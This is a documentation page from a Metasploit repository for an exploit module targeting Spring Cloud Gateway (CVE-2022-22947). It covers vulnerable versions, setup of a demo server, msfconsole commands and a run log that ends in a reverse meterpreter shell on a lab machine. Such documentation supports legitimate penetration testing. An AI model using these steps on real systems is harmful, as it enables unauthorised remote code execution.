adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c8cd6a7864152a100013c1b2615e2bd81debb5cb
metasploit-gs/documentation/modules/exploit/linux/http/spring_cloud_gateway_rce.md
T
Ayantaker c8cd6a7864 Adding CVE-2022-22947 Spring Cloud Gateway RCE Exploit 
CVE-2022-22947 exploits Spring Cloud Gateway. The module has been tested with Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64
2022-10-06 15:48:36 -04:00

2.5 KiB
Raw Blame History

Vulnerable Application

The vulnerability exploits CVE-2022-22947 an RCE vulnerability in Spring Cloud Gateway. According to VMware, the versions affected are :

  • 3.1.0
  • 3.0.0 to 3.0.6
  • Older, unsupported versions are also affected

This demo project can be used to run a vulnerable server

Installation Instructions

# To use the pre-compile vulnerable application
wget https://github.com/wdahlenburg/spring-gateway-demo/releases/download/v.0.0.1/spring-gateway-demo-0.0.1-SNAPSHOT.jar
sudo apt install default-jdk
java -jar spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000


# If you want to compile for a version of spring cloud gateway on your own
git clone https://github.com/wdahlenburg/spring-gateway-demo.git

## In pom.xml, change the version in '<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>'. To see which spring cloud version includes which version of spring cloud gateway, look here : https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-dependencies/

apt install maven
mvn package -DskipTests
java -jar target/spring-gateway-demo-0.0.1-SNAPSHOT.jar ## This will host the app on port 9000

Verification Steps

  • Run the vulnerable server
  • Start msfconsole
  • Do: use exploit/linux/http/spring_cloud_gateway_rce
  • Do: set RHOSTS <server_ip>
  • Do: set RPORT 9000
  • Do: run
  • You should get a meterpreter shell.

Spring Cloud gateway version 3.1.0 on Linux kali 5.18.0-kali5-amd64

msf6 > use exploit/linux/http/spring_cloud_gateway_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RHOSTS 192.168.19.140
RHOSTS => 192.168.19.140
msf6 exploit(linux/http/spring_cloud_gateway_rce) > set RPORT 9000
RPORT => 9000
msf6 exploit(linux/http/spring_cloud_gateway_rce) > run

[*] Started reverse TCP handler on 192.168.19.140:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if server vulnerable
[+] Route deleted
[+] The target is vulnerable.
[+] Created route successfully with the reverse shell
[*] Trigerring reverse shell
[*] Sending stage (3020772 bytes) to 192.168.19.140
[*] Meterpreter session 1 opened (192.168.19.140:4444 -> 192.168.19.140:59916) at 2022-10-01 14:21:31 -0400
[+] Route deleted
[+] Enjoy your Shell

meterpreter >
Reference in New Issue View Git Blame Copy Permalink